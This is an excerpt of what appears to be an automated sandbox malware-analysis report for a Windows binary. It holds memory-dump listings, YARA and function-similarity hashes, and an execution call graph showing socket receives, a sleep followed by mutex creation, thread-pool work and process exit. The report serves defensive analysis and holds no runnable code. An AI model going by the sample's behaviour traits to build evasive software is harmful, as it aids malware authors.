                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Mtx_unlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1418687624-0
                                                                                                                                              • Opcode ID: 443f4a95ecbf2c34e27c76247bbcf7db3156c3f76efbab9c7dd9b2d002b8eed7
                                                                                                                                              • Instruction ID: 1697fa33769e59388d8de37df02f07ee71bd29b4dbf2cf6c724ac0ce28e0b418
                                                                                                                                              • Opcode Fuzzy Hash: 443f4a95ecbf2c34e27c76247bbcf7db3156c3f76efbab9c7dd9b2d002b8eed7
                                                                                                                                              • Instruction Fuzzy Hash: 46A100B0A017159FDB20DB74D94476AB7E8FF15399F106929EC05F7281EB31EA08CB91
                                                                                                                                              Function 00E8F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"$`'
                                                                                                                                              • API String ID: 3903695350-1436819768
                                                                                                                                              • Opcode ID: 4106f81d53af0654e6f4e5339c9a7ccfa1d8ebb3526bbc81bceca69307122a99
                                                                                                                                              • Instruction ID: 77f18580705910de45c3dd3cb63eb02e413f964001e53357b864897caab8e816
                                                                                                                                              • Opcode Fuzzy Hash: 4106f81d53af0654e6f4e5339c9a7ccfa1d8ebb3526bbc81bceca69307122a99
                                                                                                                                              • Instruction Fuzzy Hash: A1313731600601EFEB21BA79D845B5B73E8EF4035EF14643AE45DF65A5DE71A8808B21

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:621
                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                              execution_graph 10128 402e00 10129 402e28 10128->10129 10132 41c68b 10129->10132 10135 41c3d5 10132->10135 10134 402e33 10136 41c3e1 10135->10136 10137 41c3eb 10135->10137 10138 41c3be 10136->10138 10140 41c39e 10136->10140 10137->10134 10148 41cd0a 10138->10148 10140->10137 10144 41ccd5 10140->10144 10142 41c3d0 10142->10134 10145 41cce3 InitializeCriticalSectionEx 10144->10145 10146 41c3b7 10144->10146 10145->10146 10146->10134 10149 41cd1f RtlInitializeConditionVariable 10148->10149 10149->10142 10158 402ec0 10159 402f06 10158->10159 10160 402f7e GetCurrentThreadId 10158->10160 10162 41c6ac GetSystemTimePreciseAsFileTime 10159->10162 10161 402f94 10160->10161 10178 402fef 10160->10178 10168 41c6ac GetSystemTimePreciseAsFileTime 10161->10168 10161->10178 10163 402f12 10162->10163 10164 40301e 10163->10164 10166 402f1d __Mtx_unlock 10163->10166 10165 41c26a 4 API calls 10164->10165 10167 403024 10165->10167 10166->10167 10170 402f6f 10166->10170 10169 41c26a 4 API calls 10167->10169 10171 402fb9 10168->10171 10169->10171 10170->10160 10170->10178 10172 41c26a 4 API calls 10171->10172 10173 402fc0 __Mtx_unlock 10171->10173 10172->10173 10174 41c26a 4 API calls 10173->10174 10175 402fd8 __Cnd_broadcast 10173->10175 10174->10175 10176 41c26a 4 API calls 10175->10176 10175->10178 10177 40303c 10176->10177 10179 41c6ac GetSystemTimePreciseAsFileTime 10177->10179 10188 403080 shared_ptr __Mtx_unlock 10179->10188 10180 4031c5 10181 41c26a 4 API calls 10180->10181 10182 4031cb 10181->10182 10183 41c26a 4 API calls 10182->10183 10184 4031d1 10183->10184 10185 41c26a 4 API calls 10184->10185 10193 403193 __Mtx_unlock 10185->10193 10186 4031a7 __floor_pentium4 10187 41c26a 4 API calls 10190 4031dd 10187->10190 10188->10180 10188->10182 10188->10186 10189 403132 GetCurrentThreadId 10188->10189 10189->10186 10191 40313b 10189->10191 10191->10186 10192 41c6ac GetSystemTimePreciseAsFileTime 10191->10192 10194 40315f 10192->10194 10193->10186 10193->10187 10194->10180 10194->10184 10194->10193 10195 41bd4c GetSystemTimePreciseAsFileTime 10194->10195 10195->10194 10196 40e0c0 recv 10197 40e122 recv 10196->10197 10198 40e157 recv 10197->10198 10199 40e191 10198->10199 10200 40e2b3 __floor_pentium4 10199->10200 10201 41c6ac GetSystemTimePreciseAsFileTime 10199->10201 10202 40e2ee 10201->10202 10203 41c26a 4 API calls 10202->10203 10204 40e358 10203->10204 10460 408980 10462 4089d8 shared_ptr 10460->10462 10463 408aea 10460->10463 10461 405c10 3 API calls 10461->10462 10462->10461 10462->10463 10294 409f44 10296 409f4c shared_ptr 10294->10296 10295 40a953 Sleep CreateMutexA 10298 40a98e 10295->10298 10296->10295 10297 40a01f shared_ptr 10296->10297 10205 41d0c7 10207 41d0d6 10205->10207 10206 41d17f 10207->10206 10208 41d17b RtlWakeAllConditionVariable 10207->10208 9688 403c47 9689 403c51 9688->9689 9692 403c5f 9689->9692 9695 4032d0 9689->9695 9690 403c68 9692->9690 9714 403810 9692->9714 9718 41c6ac 9695->9718 9697 40336b 9724 41c26a 9697->9724 9700 40333c __Mtx_unlock 9701 41c26a 4 API calls 9700->9701 9703 403350 __floor_pentium4 9700->9703 9704 403377 9701->9704 9702 403314 9702->9697 9702->9700 9721 41bd4c 9702->9721 9703->9692 9705 41c6ac GetSystemTimePreciseAsFileTime 9704->9705 9706 4033af 9705->9706 9707 41c26a 4 API calls 9706->9707 9708 4033b6 __Cnd_broadcast 9706->9708 9707->9708 9709 41c26a 4 API calls 9708->9709 9711 4033d7 __Mtx_unlock 9708->9711 9709->9711 9710 41c26a 4 API calls 9713 40340e 9710->9713 9711->9710 9712 4033eb 9711->9712 9712->9692 9713->9692 9715 40381c 9714->9715 9799 402440 9715->9799 9728 41c452 9718->9728 9720 41c6b9 9720->9702 9745 41bb72 9721->9745 9723 41bd5c 9723->9702 9725 41c292 9724->9725 9727 41c274 9724->9727 9725->9725 9727->9725 9751 41c297 9727->9751 9729 41c4a8 9728->9729 9731 41c47a __floor_pentium4 9728->9731 9729->9731 9734 41cf6b 9729->9734 9731->9720 9732 41c4fd __Xtime_diff_to_millis2 9732->9731 9733 41cf6b _xtime_get GetSystemTimePreciseAsFileTime 9732->9733 9733->9732 9735 41cf7a 9734->9735 9737 41cf87 __aulldvrm 9734->9737 9735->9737 9738 41cf44 9735->9738 9737->9732 9741 41cbea 9738->9741 9742 41cc07 9741->9742 9743 41cbfb GetSystemTimePreciseAsFileTime 9741->9743 9742->9737 9743->9742 9746 41bb9c 9745->9746 9747 41cf6b _xtime_get GetSystemTimePreciseAsFileTime 9746->9747 9750 41bba4 __Xtime_diff_to_millis2 __floor_pentium4 9746->9750 9748 41bbcf __Xtime_diff_to_millis2 9747->9748 9749 41cf6b _xtime_get GetSystemTimePreciseAsFileTime 9748->9749 9748->9750 9749->9750 9750->9723 9754 402ae0 9751->9754 9753 41c2ae std::_Throw_future_error 9761 41bedf 9754->9761 9756 402af4 __dosmaperr 9756->9753 9764 43a671 9756->9764 9775 41cc31 9761->9775 9768 43a67b __dosmaperr ___free_lconv_mon 9764->9768 9765 436ccc 9769 438bec 9765->9769 9766 438bec __cftof 3 API calls 9767 43a72d 9766->9767 9768->9765 9768->9766 9770 438bf1 __cftof 9769->9770 9774 438bfc __cftof 9770->9774 9779 43d634 9770->9779 9793 4365ed 9774->9793 9776 41cc3f InitOnceExecuteOnce 9775->9776 9778 41bef2 9775->9778 9776->9778 9778->9756 9780 43d640 __cftof __dosmaperr 9779->9780 9781 43d69c __cftof __dosmaperr 9780->9781 9782 43d726 9780->9782 9783 43d81b __dosmaperr 9780->9783 9785 43d751 __cftof 9780->9785 9781->9774 9782->9785 9796 43d62b 9782->9796 9784 4365ed __cftof 3 API calls 9783->9784 9786 43d82e 9784->9786 9785->9781 9788 43a671 __cftof 3 API calls 9785->9788 9791 43d7a5 9785->9791 9788->9791 9790 43d62b __cftof 3 API calls 9790->9785 9791->9781 9792 43a671 __cftof 3 API calls 9791->9792 9792->9781 9794 4364c7 __cftof 3 API calls 9793->9794 9795 4365fe 9794->9795 9797 43a671 __cftof 3 API calls 9796->9797 9798 43d630 9797->9798 9798->9790 9802 41b5d6 9799->9802 9801 402472 9803 41b5f1 std::_Throw_future_error 9802->9803 9804 438bec __cftof 3 API calls 9803->9804 9806 41b658 __cftof __floor_pentium4 9803->9806 9805 41b69f 9804->9805 9806->9801 9807 436a44 9808 436a52 9807->9808 9809 436a5c 9807->9809 9812 43698d 9809->9812 9811 436a76 ___free_lconv_mon 9815 43690a 9812->9815 9814 43699f 9814->9811 9816 43692a 9815->9816 9817 436921 9815->9817 9816->9817 9818 43a671 __cftof 3 API calls 9816->9818 9817->9814 9819 43694a 9818->9819 9823 43b5fb 9819->9823 9824 436960 9823->9824 9825 43b60e 9823->9825 9827 43b628 9824->9827 9825->9824 9831 43f5ab 9825->9831 9828 43b63b 9827->9828 9830 43b650 9827->9830 9828->9830 9838 43e6b1 9828->9838 9830->9817 9832 43f5b7 __dosmaperr 9831->9832 9833 43a671 __cftof 3 API calls 9832->9833 9834 43f5c0 __cftof __dosmaperr 9833->9834 9835 43f606 9834->9835 9836 438bec __cftof 3 API calls 9834->9836 9835->9824 9837 43f62b 9836->9837 9839 43a671 __cftof 3 API calls 9838->9839 9840 43e6bb 9839->9840 9843 43e5c9 9840->9843 9842 43e6c1 9842->9830 9847 43e5d5 __cftof __dosmaperr ___free_lconv_mon 9843->9847 9844 43e5f6 9844->9842 9845 438bec __cftof 3 API calls 9846 43e668 9845->9846 9848 43e6a4 9846->9848 9852 43a72e 9846->9852 9847->9844 9847->9845 9848->9842 9856 43a739 __dosmaperr ___free_lconv_mon 9852->9856 9853 438bec __cftof 3 API calls 9854 43a7c7 9853->9854 9855 43a7be 9857 43e4b0 9855->9857 9856->9853 9856->9855 9858 43e5c9 __cftof 3 API calls 9857->9858 9859 43e4c3 9858->9859 9864 43e259 9859->9864 9861 43e4cb __cftof 9863 43e4dc __cftof __dosmaperr ___free_lconv_mon 9861->9863 9867 43e6c4 9861->9867 9863->9848 9865 43690a __cftof 3 API calls 9864->9865 9866 43e26b 9865->9866 9866->9861 9868 43e259 __cftof 3 API calls 9867->9868 9869 43e6e4 __cftof 9868->9869 9870 43e75a __cftof __floor_pentium4 9869->9870 9872 43e32f 9869->9872 9870->9863 9873 43e357 9872->9873 9879 43e420 __floor_pentium4 9872->9879 9873->9879 9880 43f1bf 9873->9880 9875 43e3d7 9883 444dfe 9875->9883 9877 43e3f8 9878 444dfe __cftof 3 API calls 9877->9878 9878->9879 9879->9870 9881 43690a __cftof 3 API calls 9880->9881 9882 43f1df __cftof __freea __floor_pentium4 9881->9882 9882->9875 9884 43690a __cftof 3 API calls 9883->9884 9885 444e11 __cftof 9884->9885 9885->9877 10242 403c8e 10243 403c98 10242->10243 10244 402410 4 API calls 10243->10244 10245 403ca5 10243->10245 10244->10245 10246 403810 3 API calls 10245->10246 10247 403ccf 10246->10247 10248 403810 3 API calls 10247->10248 10249 403cdb shared_ptr 10248->10249 10343 41d111 10345 41d122 10343->10345 10344 41d12a 10345->10344 10347 41d199 10345->10347 10348 41d1a7 SleepConditionVariableCS 10347->10348 10350 41d1c0 10347->10350 10348->10350 10350->10345 10351 402b10 10352 402b1a 10351->10352 10353 402b1c 10351->10353 10354 41c26a 4 API calls 10353->10354 10355 402b22 10354->10355 10464 402b90 10465 402bce 10464->10465 10466 41b7fb TpReleaseWork 10465->10466 10467 402bdb shared_ptr __floor_pentium4 10466->10467 9667 40a856 9668 40a870 9667->9668 9670 40a892 shared_ptr 9667->9670 9669 40a953 Sleep CreateMutexA 9668->9669 9668->9670 9671 40a98e 9669->9671 10309 40215a 10312 41c6fc 10309->10312 10311 402164 10314 41c70c 10312->10314 10315 41c724 10312->10315 10314->10315 10316 41cfbe 10314->10316 10315->10311 10317 41ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10316->10317 10318 41cfd0 10317->10318 10318->10314 10209 409adc 10210 409aea 10209->10210 10214 409afe shared_ptr 10209->10214 10211 40a917 10210->10211 10210->10214 10212 40a953 Sleep CreateMutexA 10211->10212 10213 40a98e 10212->10213 10215 405c10 3 API calls 10214->10215 10216 409b7c 10215->10216 10223 408b30 10216->10223 10218 409b8d 10219 405c10 3 API calls 10218->10219 10220 409cb1 10219->10220 10221 408b30 3 API calls 10220->10221 10222 409cc2 10221->10222 10224 408b7c 10223->10224 10225 405c10 3 API calls 10224->10225 10227 408b97 shared_ptr 10225->10227 10226 408d01 shared_ptr __floor_pentium4 10226->10218 10227->10226 10228 405c10 3 API calls 10227->10228 10230 408d9a shared_ptr 10228->10230 10229 408e7e shared_ptr __floor_pentium4 10229->10218 10230->10229 10231 405c10 3 API calls 10230->10231 10232 408f1a shared_ptr __floor_pentium4 10231->10232 10232->10218 10468 403f9f 10469 403fb6 10468->10469 10470 403fad 10468->10470 10471 402410 4 API calls 10470->10471 10471->10469 10250 4020a0 10251 41c68b __Mtx_init_in_situ 2 API calls 10250->10251 10252 4020ac 10251->10252 10356 404120 10357 40416a 10356->10357 10359 4041b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10357->10359 10360 403ee0 10357->10360 10361 403f48 10360->10361 10362 403f1e 10360->10362 10363 403f58 10361->10363 10366 402c00 10361->10366 10362->10359 10363->10359 10367 402c0e 10366->10367 10373 41b847 10367->10373 10369 402c42 10370 402c49 10369->10370 10379 402c80 10369->10379 10370->10359 10372 402c58 std::_Throw_future_error 10374 41b854 10373->10374 10378 41b873 Concurrency::details::_Reschedule_chore 10373->10378 10382 41cb77 10374->10382 10376 41b864 10376->10378 10384 41b81e 10376->10384 10378->10369 10390 41b7fb 10379->10390 10381 402cb2 shared_ptr 10381->10372 10383 41cb92 CreateThreadpoolWork 10382->10383 10383->10376 10385 41b827 Concurrency::details::_Reschedule_chore 10384->10385 10388 41cdcc 10385->10388 10387 41b841 10387->10378 10389 41cde1 TpPostWork 10388->10389 10389->10387 10391 41b807 10390->10391 10392 41b817 10390->10392 10391->10392 10394 41ca78 10391->10394 10392->10381 10395 41ca8d TpReleaseWork 10394->10395 10395->10392 10415 403fe0 10416 404022 10415->10416 10417 4040d2 10416->10417 10418 40408c 10416->10418 10421 404035 __floor_pentium4 10416->10421 10419 403ee0 3 API calls 10417->10419 10422 4035e0 10418->10422 10419->10421 10423 403616 10422->10423 10427 40364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10423->10427 10428 402ce0 10423->10428 10425 40369e 10426 402c00 3 API calls 10425->10426 10425->10427 10426->10427 10427->10421 10429 402d1d 10428->10429 10430 41bedf InitOnceExecuteOnce 10429->10430 10431 402d46 10430->10431 10432 402d51 __floor_pentium4 10431->10432 10433 402d88 10431->10433 10437 41bef7 10431->10437 10432->10425 10435 402440 3 API calls 10433->10435 10436 402d9b 10435->10436 10436->10425 10438 41bf03 std::_Throw_future_error 10437->10438 10439 41bf73 10438->10439 10440 41bf6a 10438->10440 10441 402ae0 4 API calls 10439->10441 10444 41be7f 10440->10444 10443 41bf6f 10441->10443 10443->10433 10445 41cc31 InitOnceExecuteOnce 10444->10445 10446 41be97 10445->10446 10447 41be9e 10446->10447 10448 436cbb 3 API calls 10446->10448 10447->10443 10449 41bea7 10448->10449 10449->10443 10472 409ba5 10473 409ba7 10472->10473 10474 405c10 3 API calls 10473->10474 10475 409cb1 10474->10475 10476 408b30 3 API calls 10475->10476 10477 409cc2 10476->10477 9672 436629 9675 4364c7 9672->9675 9676 4364d5 __cftof 9675->9676 9677 436520 9676->9677 9680 43652b 9676->9680 9679 43652a 9686 43a302 GetPEB 9680->9686 9682 436535 9683 43653a GetPEB 9682->9683 9684 43654a __cftof 9682->9684 9683->9684 9685 436562 ExitProcess 9684->9685 9687 43a31c __cftof 9686->9687 9687->9682 10253 405cad 10255 405caf __cftof 10253->10255 10254 405d17 shared_ptr __floor_pentium4 10255->10254 10256 405c10 3 API calls 10255->10256 10257 4066ac 10256->10257 10258 405c10 3 API calls 10257->10258 10259 4066b1 10258->10259 10260 4022c0 3 API calls 10259->10260 10261 4066c9 shared_ptr 10260->10261 10262 405c10 3 API calls 10261->10262 10263 40673d 10262->10263 10264 4022c0 3 API calls 10263->10264 10266 406757 shared_ptr 10264->10266 10265 405c10 3 API calls 10265->10266 10266->10265 10267 4022c0 3 API calls 10266->10267 10268 406852 shared_ptr __floor_pentium4 10266->10268 10267->10266 10269 4042b0 10272 403ac0 10269->10272 10271 4042bb shared_ptr 10273 403af9 10272->10273 10274 4032d0 5 API calls 10273->10274 10276 403c38 10273->10276 10278 403b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10273->10278 10274->10276 10275 4032d0 5 API calls 10279 403c5f 10275->10279 10276->10275 10276->10279 10277 403c68 10277->10271 10278->10271 10279->10277 10280 403810 3 API calls 10279->10280 10281 403cdb shared_ptr 10280->10281 10281->10271 10319 403970 10320 41c68b __Mtx_init_in_situ 2 API calls 10319->10320 10321 4039a7 10320->10321 10322 41c68b __Mtx_init_in_situ 2 API calls 10321->10322 10323 4039e6 10322->10323 10324 402170 10325 41c6fc InitializeCriticalSectionEx 10324->10325 10326 40217a 10325->10326 10450 4055f0 10451 405610 10450->10451 10452 4022c0 3 API calls 10451->10452 10453 405710 __floor_pentium4 10451->10453 10452->10451 10454 4043f0 10455 41bedf InitOnceExecuteOnce 10454->10455 10456 40440a 10455->10456 10457 404411 10456->10457 10458 436cbb 3 API calls 10456->10458 10459 404424 10458->10459 10233 419ef0 10234 419f0c 10233->10234 10235 41c68b __Mtx_init_in_situ 2 API calls 10234->10235 10236 419f17 10235->10236 9886 404276 9889 402410 9886->9889 9888 40427f 9890 402424 9889->9890 9893 41b52d 9890->9893 9901 433aed 9893->9901 9895 41b5a5 ___std_exception_copy 9908 41b1ad 9895->9908 9897 41b598 9904 41af56 9897->9904 9900 40242a 9900->9888 9912 434f29 9901->9912 9905 41af9f ___std_exception_copy 9904->9905 9906 41afb2 shared_ptr 9905->9906 9919 41b39f 9905->9919 9906->9900 9909 41b1d8 9908->9909 9911 41b1e1 shared_ptr 9908->9911 9910 41b39f 4 API calls 9909->9910 9910->9911 9911->9900 9914 434f2e __cftof 9912->9914 9913 41b555 9913->9895 9913->9897 9913->9900 9914->9913 9915 43d634 __cftof 3 API calls 9914->9915 9918 438bfc __cftof 9914->9918 9915->9918 9916 4365ed __cftof 3 API calls 9917 438c2f 9916->9917 9918->9916 9920 41bedf InitOnceExecuteOnce 9919->9920 9921 41b3e1 9920->9921 9922 41b3e8 9921->9922 9930 436cbb 9921->9930 9922->9906 9931 436cc7 __dosmaperr 9930->9931 9932 43a671 __cftof 3 API calls 9931->9932 9935 436ccc 9932->9935 9933 438bec __cftof 3 API calls 9934 436cf6 9933->9934 9935->9933 10282 409ab8 10284 409acc 10282->10284 10285 409b08 